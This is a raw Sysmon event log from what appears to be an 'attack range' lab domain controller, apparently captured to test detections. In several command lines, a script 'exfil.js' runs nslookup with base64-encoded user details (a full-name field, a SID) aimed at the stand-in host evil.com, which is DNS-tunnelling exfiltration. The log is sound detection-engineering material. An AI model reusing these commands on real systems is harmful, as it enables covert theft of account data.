14:16:14.537{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-983E-000000005F02}3360C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 22542200x8000000000000000196138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.956{00000000-0000-0000-0000-000000000000}7960evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000196137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.537{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000196136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.806{00000000-0000-0000-0000-000000000000}7252evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000196135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.537{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.537{2E1864BB-17AE-629A-963E-000000005F02}69322928C:\Windows\system32\cmd.exe{2E1864BB-17AE-629A-983E-000000005F02}3360C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000196133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.671{00000000-0000-0000-0000-000000000000}6520evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.547{00000000-0000-0000-0000-000000000000}8076evil.com0::ffff:127.0.0.1;<unknown process> 154100x8000000000000000196131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.551{2E1864BB-17AE-629A-983E-000000005F02}3360C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AE-629A-963E-000000005F02}6932C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmrq.tmp 2>&1 22542200x8000000000000000196130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.464{00000000-0000-0000-0000-000000000000}2384evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.391{00000000-0000-0000-0000-000000000000}4344evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.246{00000000-0000-0000-0000-000000000000}984evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000196127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.498{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-973E-000000005F02}4616C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.498{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-973E-000000005F02}4616C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.498{2E1864BB-17AE-629A-973E-000000005F02}46161788C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-963E-000000005F02}6932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.483{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-973E-000000005F02}4616C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.467{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-963E-000000005F02}6932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.467{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.467{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.467{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.467{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.467{2E1864BB-17A1-629A-783D-000000005F02}55527888C:\Windows\System32\WScript.exe{2E1864BB-17AE-629A-963E-000000005F02}6932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.472{2E1864BB-17AE-629A-963E-000000005F02}6932C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmrq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.467{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwzevrw.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.436{2E1864BB-17AE-629A-943E-000000005F02}55927904C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-953E-000000005F02}968C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.420{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.420{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.420{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.420{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.420{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-953E-000000005F02}968C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.420{2E1864BB-17AE-629A-933E-000000005F02}4207752C:\Windows\system32\cmd.exe{2E1864BB-17AE-629A-953E-000000005F02}968C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.433{2E1864BB-17AE-629A-953E-000000005F02}968C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AE-629A-933E-000000005F02}420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwzevrw.tmp 2>&1 10341000x8000000000000000196107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.396{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-943E-000000005F02}5592C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.396{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-943E-000000005F02}5592C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.396{2E1864BB-17AE-629A-943E-000000005F02}55927904C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-933E-000000005F02}420C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.381{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-943E-000000005F02}5592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.381{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-933E-000000005F02}420C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.381{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 